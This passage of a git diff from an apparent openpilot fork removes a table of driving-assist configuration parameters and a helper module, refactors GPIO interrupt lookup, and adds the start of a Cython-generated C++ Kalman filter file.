'UInt8', 'min': 0, 'max': 4, 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_speed', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_event', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_face', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_lead_info', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_laneline', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_chevron', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_dm_cam', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_ui_rainbow', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - - #toyota - {'name': 'dp_toyota_sng', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_accel_profile_ctrl', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_accel_profile', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 2, 'depends': [{'name': 'dp_accel_profile_ctrl', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_toyota_ap_btn_link', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_toyota_cruise_override', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_toyota_cruise_override_speed', 'default': 30, 'type': 'UInt8', 'min': 5, 'max': 60, 'depends': [{'name': 'dp_accel_profile_ctrl', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_toyota_auto_lock', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_toyota_auto_unlock', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_toyota_fp_btn_link', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_toyota_debug_bsm', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - - {'name': 'dp_mapd', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_local_db', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - - - # dashcam related - {'name': 'dp_dashcamd', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # # auto shutdown - {'name': 'dp_auto_shutdown', 'default': True, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_auto_shutdown_in', 'default': 60, 'type': 'UInt16', 'min': 0, 'max': 600, 'depends': [{'name': 'dp_auto_shutdown', 'vals': [True]}], 'conf_type': ['param']}, - - {'name': 'dp_mazda_steer_alert', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_mazda_dashcam_bypass', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # # service - # {'name': 'dp_updated', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_logger', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_athenad', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_atl', 'vals': [False]}], 'conf_type': ['param', 'struct'], 'update_once': True}, - # {'name': 'dp_uploader', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_atl', 'vals': [False]}], 'conf_type': ['param', 'struct'], 'update_once': True}, - # # {'name': 'dp_gpxd', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_hotspot_on_boot', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_honda_eps_mod', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_dm', 'default': True if not TICI else False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_speed_check', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_temp_check', 'default': True, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_vag_resume_fix', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # # lat ctrl - # {'name': 'dp_lane_less_mode_ctrl', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_lane_less_mode', 'default': 2, 'type': 'UInt8', 'min': 0, 'max': 2, 'depends': [{'name': 'dp_lane_less_mode_ctrl', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - # # long ctrl - # {'name': 'dp_allow_gas', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_atl', 'vals': [False]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_following_profile_ctrl', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_following_profile', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 2, 'depends': [{'name': 'dp_following_profile_ctrl', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_tune', 'default': 0, 'type': 'UInt8', 'conf_type': ['param']}, - {'name': 'dp_lateral_torque_live_tune', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_lateral_alt', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_alt_speed', 'default': 80, 'type': 'UInt8', 'min': 10, 'max': 130, 'depends': [{'name': 'dp_lateral_alt', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_alt_ctrl', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 3, 'depends': [{'name': 'dp_lateral_alt', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_alt_lanelines', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_lateral_alt', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_alt_camera_offset', 'default': 4 if TICI else -6, 'type': 'Int8', 'min': -100, 'max': 100, 'depends': [{'name': 'dp_lateral_alt', 'vals': [True]}, {'name': 'dp_lateral_alt_lanelines', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_lateral_alt_path_offset', 'default': 4 if TICI else 0, 'type': 'Int8', 'min': -100, 'max': 100, 'depends': [{'name': 'dp_lateral_alt', 'vals': [True]}, {'name': 'dp_lateral_alt_lanelines', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - # {'name': 'dp_accel_profile_ctrl', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_accel_profile', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 2, 'depends': [{'name': 'dp_accel_profile_ctrl', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - # # safety - # {'name': 'dp_gear_check', 'default': True, 'type': 'Bool', 'depends': [{'name': 'dp_atl', 'vals': [False]}], 'conf_type': ['param', 'struct']}, - # # UIs - # {'name': 'dp_ui_display_mode', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 1, 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_speed', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_event', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_max_speed', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_face', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_lane', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_lead', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_side', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_top', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_blinker', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_brightness', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 100, 'conf_type': ['param', 'struct']}, - # {'name': 'dp_ui_volume', 'default': -5, 'type': 'Int8', 'min': -5, 'max': 100, 'conf_type': ['param', 'struct']}, - # # toyota - {'name': 'dp_toyota_rav4_tss2_tune', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_toyota_prius_bad_angle_tune', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_e2e_conditional', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - #{'name': 'dp_e2e_conditional_at_speed', 'default': 60, 'type': 'UInt8', 'min': 30, 'max': 80, 'depends': [{'name': 'dp_e2e_conditional', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - #{'name': 'dp_e2e_conditional_at_speed_lead', 'default': 40, 'type': 'UInt8', 'min': 0, 'max': 80, 'depends': [{'name': 'dp_e2e_conditional', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_e2e_conditional_adapt_fp', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_e2e_conditional', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_e2e_conditional_adapt_ap', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_e2e_conditional', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - {'name': 'dp_e2e_conditional_voacc', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_e2e_conditional', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - # {'name': 'dp_toyota_no_min_acc_limit', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_toyota_ldw', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - {'name': 'dp_toyota_zss', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_toyota_change5speed', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_toyota_fp_btn_link', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_toyota_ap_btn_link', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_toyota_disable_relay', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_toyota_cruise_override', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_toyota_cruise_override_vego', 'default': False, 'type': 'Bool', 'depends': [{'name': 'dp_toyota_cruise_override', 'vals': [True]}], 'conf_type': ['param', 'struct']}, - # {'name': 'dp_toyota_cruise_override_at', 'default': 44, 'type': 'Float32', 'depends': [{'name': 'dp_toyota_cruise_override', 'vals': [True]}], 'min': 0, 'max': 50., 'conf_type': ['param', 'struct']}, - # {'name': 'dp_toyota_cruise_override_speed', 'default': 32, 'type': 'Float32', 'depends': [{'name': 'dp_toyota_cruise_override', 'vals': [True]}], 'min': 0, 'max': 50., 'conf_type': ['param', 'struct']}, - # # hyundai - # {'name': 'dp_hkg_smart_mdps', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # # honda - # {'name': 'dp_honda_kmh_display', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # # volkswagen - # # {'name': 'dp_vw_panda', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # #misc - # {'name': 'dp_ip_addr', 'default': '', 'type': 'Text', 'conf_type': ['struct']}, - # {'name': 'dp_fan_mode', 'default': 0, 'type': 'UInt8', 'min': 0, 'max': 2, 'conf_type': ['param']}, - # {'name': 'dp_last_modified', 'default': str(floor(time.time())), 'type': 'Text', 'conf_type': ['param']}, - # {'name': 'dp_camera_offset', 'default': CAMERA_OFFSET, 'type': 'Int8', 'min': -100, 'max': 100, 'conf_type': ['param', 'struct']}, - # {'name': 'dp_path_offset', 'default': 0 if EON else -4 if TICI else 0, 'type': 'Int8', 'min': -100, 'max': 100, 'conf_type': ['param', 'struct']}, - # - # {'name': 'dp_reg', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # # sr learner related - # {'name': 'dp_sr_learner', 'default': True, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # {'name': 'dp_sr_custom', 'default': 9.99, 'min': 9.99, 'max': 30., 'type': 'Float32', 'depends': [{'name': 'dp_sr_learner', 'vals': [False]}], 'conf_type': ['param', 'struct']}, - # {'name': 'dp_sr_stock', 'default': 9.99, 'min': 9.99, 'max': 100., 'type': 'Float32', 'conf_type': ['param']}, - # - # {'name': 'dp_lqr', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_reset_live_param_on_start', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # - # {'name': 'dp_car_assigned', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - # {'name': 'dp_no_batt', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_last_candidate', 'default': '', 'type': 'Text', 'conf_type': ['param']}, - # {'name': 'dp_prebuilt', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_gpxd', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_mapd', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, - # # no gps is for mr. one's harness + black panda in one solution (without GPS chip) - # {'name': 'dp_panda_no_gps', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # - # {'name': 'dp_no_offroad_fix', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - # {'name': 'dp_ftpd', 'default': False, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'dp_lateral_version', 'default': 0, 'min': 0, 'max': 2, 'type': 'UInt8', 'conf_type': ['param']}, - {'name': 'dp_lateral_steer_rate_cost', 'default': 1.0, 'min': 0.5, 'max': 2.0, 'type': 'Float32', 'conf_type': ['param']}, - {'name': 'dp_upload_ignored', 'default': True, 'type': 'Bool', 'conf_type': ['param']}, - {'name': 'local_trip_count_total', 'default': 0.0, 'type': 'Float32', 'conf_type': ['param']}, - {'name': 'local_trip_meter_total', 'default': 0.0, 'type': 'Float32', 'conf_type': ['param']}, - {'name': 'local_trip_min_total', 'default': 0.0, 'type': 'Float32', 'conf_type': ['param']}, - {'name': 'dp_lateral_lc_manual', 'default': False, 'type': 'Bool', 'conf_type': ['param', 'struct']}, -] - -def get_definition(name): - for conf in confs: - if conf['name'] == name: - return conf - return None - -def to_param_val(name, val): - conf = get_definition(name) - if conf is not None: - type = conf['type'].lower() - try: - if 'bool' in type: - val = '1' if val else '0' - elif 'int' in type: - val = int(val) - elif 'float' in type: - val = float(val) - return str(val) - except (ValueError, TypeError): - return '' - return '' - -def to_struct_val(name, val): - conf = get_definition(name) - if conf is not None: - try: - type = conf['type'].lower() - if 'bool' in type: - val = True if val == '1' else False - elif 'int' in type: - val = int(val) - elif 'float' in type: - val = float(val) - return val - except (ValueError, TypeError): - return None - return None - -''' -function to convert param name into struct name. -''' -def get_struct_name(snake_str): - components = snake_str.split('_') - # We capitalize the first letter of each component except the first one - # with the 'title' method and join them together. - return components[0] + ''.join(x.title() for x in components[1:]) - -''' -function to generate struct for log.capnp -''' -def gen_log_struct(): - count = 0 - str = "# dp\n" - str += "struct DragonConf {\n" - for conf in confs: - name = get_struct_name(conf['name']) - if 'struct' in conf['conf_type']: - str += f" {name} @{count} :{conf['type']};\n" - count += 1 - str += "}" - print(str) - -''' -function to generate support car list -''' -def get_support_car_list(): - attrs = ['FINGERPRINTS', 'FW_VERSIONS'] - cars = dict({"cars": []}) - models = [] - for car_folder in [x[0] for x in os.walk('/data/openpilot/selfdrive/car')]: - try: - car_name = car_folder.split('/')[-1] - if car_name != "mock": - for attr in attrs: - values = __import__('selfdrive.car.%s.values' % car_name, fromlist=[attr]) - if hasattr(values, attr): - attr_values = getattr(values, attr) - else: - continue - if isinstance(attr_values, dict): - for f, v in attr_values.items(): - if f not in models: - models.append(f) - except (ImportError, IOError, ValueError): - pass - models.sort() - cars["cars"] = models - return json.dumps(cars) - -''' -function to init param value. -should add this into manager.py -''' -def init_params_vals(params): - for conf in confs: - if 'param' in conf['conf_type']: - if conf['name'] == 'dp_car_list': - params.put(conf['name'], get_support_car_list()) - elif params.get(conf['name']) is None: - params.put(conf['name'], to_param_val(conf['name'], conf['default'])) - -def gen_params_cc_keys(): - for conf in confs: - if 'param' in conf['conf_type']: - print(" {\"%s\", PERSISTENT}," % conf['name']) - - -if __name__ == "__main__": - if (len(sys.argv) > 1) and sys.argv[1] == 'cc': - gen_params_cc_keys() - else: - gen_log_struct() diff --git a/common/dp_helpers.py b/common/dp_helpers.py deleted file mode 100644 index 064949c20..000000000 --- a/common/dp_helpers.py +++ /dev/null @@ -1,59 +0,0 @@ -#!/usr/bin/env python3.7 -# import subprocess -# from cereal import car -from common.params import Params -from common.realtime import sec_since_boot -import os -params = Params() -LAST_MODIFIED = params.get_param_path() + "/dp_last_modified" - -# delay of reading last modified -# LAST_MODIFIED_TIMER_THERMALD = 10. -LAST_MODIFIED_TIMER_SYSTEMD = 1. -# LAST_MODIFIED_TIMER_LANE_PLANNER = 3. -# LAST_MODIFIED_TIMER_UPLOADER = 10. - -# def is_online(): -# try: -# return not subprocess.call(["ping", "-W", "4", "-c", "1", "117.28.245.92"]) -# except ProcessLookupError: -# return False -# -# def common_controller_ctrl(enabled, dragonconf, blinker_on, steer_req, v_ego): -# if enabled: -# if dragonconf.dpLateralMode == 0 and blinker_on: -# steer_req = 0 if isinstance(steer_req, int) else False -# return steer_req -# -def get_last_modified(delay, old_check, old_modified): - new_check = sec_since_boot() - if os.path.isfile(LAST_MODIFIED) and (old_check is None or new_check - old_check >= delay): - return new_check, os.stat(LAST_MODIFIED).st_mtime - else: - return old_check, old_modified - -# def param_get_if_updated(param, type, old_val, old_modified): -# try: -# modified = os.stat(PARAM_PATH + param).st_mtime -# except OSError: -# return old_val, old_modified -# if old_modified != modified: -# new_val = param_get(param, type, old_val) -# new_modified = modified -# else: -# new_val = old_val -# new_modified = old_modified -# return new_val, new_modified - -# def param_get(param_name, type, default): -# try: -# val = params.get(param_name, encoding='utf8').rstrip('\x00') -# if type == 'bool': -# val = val == '1' -# elif type == 'int': -# val = int(val) -# elif type == 'float': -# val = float(val) -# except (TypeError, ValueError): -# val = default -# return val diff --git a/common/gpio.py b/common/gpio.py index 711fcff85..e31c8c52e 100644 --- a/common/gpio.py +++ b/common/gpio.py @@ -1,4 +1,4 @@ -import glob +from functools import lru_cache from typing import Optional, List def gpio_init(pin: int, output: bool) -> None: @@ -25,12 +25,20 @@ def gpio_read(pin: int) -> Optional[bool]: return val -def get_irq_for_action(action: str) -> List[int]: - ret = [] - for fn in glob.glob('/sys/kernel/irq/*/actions'): - with open(fn) as f: +@lru_cache(maxsize=None) +def get_irq_action(irq: int) -> List[str]: + try: + with open(f"/sys/kernel/irq/{irq}/actions") as f: actions = f.read().strip().split(',') - if action in actions: - irq = int(fn.split('/')[-2]) + return actions + except FileNotFoundError: + return [] + +def get_irqs_for_action(action: str) -> List[str]: + ret = [] + with open("/proc/interrupts") as f: + for l in f.readlines(): + irq = l.split(':')[0].strip() + if irq.isdigit() and action in get_irq_action(irq): ret.append(irq) return ret diff --git a/common/kalman/simple_kalman_impl.cpp b/common/kalman/simple_kalman_impl.cpp new file mode 100644 index 000000000..4bb48892a --- /dev/null +++ b/common/kalman/simple_kalman_impl.cpp @@ -0,0 +1,10491 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "language": "c++", + "name": "common.kalman.simple_kalman_impl", + "sources": [ + "/data/openpilot/common/kalman/simple_kalman_impl.pyx" + ] + }, + "module_name": "common.kalman.simple_kalman_impl" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define 